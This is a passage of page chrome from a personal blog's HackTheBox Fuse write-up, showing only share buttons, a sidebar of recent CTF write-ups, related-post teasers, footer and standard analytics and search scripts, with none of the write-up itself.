4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox: Fuse write-up - GoDiego&url=https://diego95root.github.io/posts/Fuse/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox: Fuse write-up - GoDiego&u=https://diego95root.github.io/posts/Fuse/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox: Fuse write-up - GoDiego&url=https://diego95root.github.io/posts/Fuse/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://diego95root.github.io/posts/Fuse/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/Fuse/">HackTheBox: Fuse write-up</a></li><li><a href="/posts/Magic/">Hack The Box: Magic write-up</a></li><li><a href="/posts/Cache/">HackTheBox: Cache write-up</a></li><li><a href="/posts/Blunder/">HackTheBox: Blunder write-up</a></li><li><a href="/posts/Admirer/">HackTheBox: Admirer write-up</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Blunder/" class="btn btn-outline-primary"><p>HackTheBox: Blunder write-up</p></a> <a href="/posts/SneakyMailer/" class="btn btn-outline-primary"><p>HackTheBox: SneakyMailer write-up</p></a></div><!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Admirer/"><div class="card-body"> <span class="timeago small"> Jun 3, 2020 <i class="unloaded">2020-06-03T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Admirer write-up</h3><div class="text-muted small"><p>Hack The Box: Magic machine write-up This was one of the most interesting machines I’ve solved in Hack The Box, learned some cool techniques. It taught me how recon never ends, despite having foun...</p></div></div></a></div><div class="card"> <a href="/posts/Secnotes/"><div class="card-body"> <span class="timeago small"> Oct 11, 2018 <i class="unloaded">2018-10-11T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box: Secnotes write-up</h3><div class="text-muted small"><p>Hack The Box: Secnotes machine write-up This machine was a really challenging one, for it was based on a second order SQL injection which led to some SMB credentials. Then, we could upload a php s...</p></div></div></a></div><div class="card"> <a href="/posts/Heist/"><div class="card-body"> <span class="timeago small"> Aug 21, 2019 <i class="unloaded">2019-08-21T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box: Heist write-up</h3><div class="text-muted small"><p>Hack The Box: Heist machine write-up This is a windows box thoroughly based on enumeration, it starts with a guest access that leaks some credentials followed by smb users enumeration that provide...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js" crossorigin="anonymous"></script> <script type="text/javascript"> const el = document.querySelectorAll('#post-wrapper img'); const observer = lozad(el); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/secfaults">Diego Bernal Adelantado</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/sql/">SQL</a> <a class="post-tag" href="/tags/ctf/">CTF</a> <a class="post-tag" href="/tags/ssh/">SSH</a> <a class="post-tag" href="/tags/permissions/">Permissions</a> <a class="post-tag" href="/tags/php/">PHP</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/smb/">SMB</a> <a class="post-tag" href="/tags/john/">John</a> <a class="post-tag" href="/tags/enumeration/">Enumeration</a> <a class="post-tag" href="/tags/file-upload/">File Upload</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-167902069-1', 'auto'); ga('send', 'pageview'); </script> --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-167902069-1" crossorigin="anonymous"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-167902069-1'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js" integrity="sha256-qcLR00zq6pJk4je3MLgAri8Nn+ZumUlXgTKR2H/xCY0=" crossorigin="anonymous"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://diego95root.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
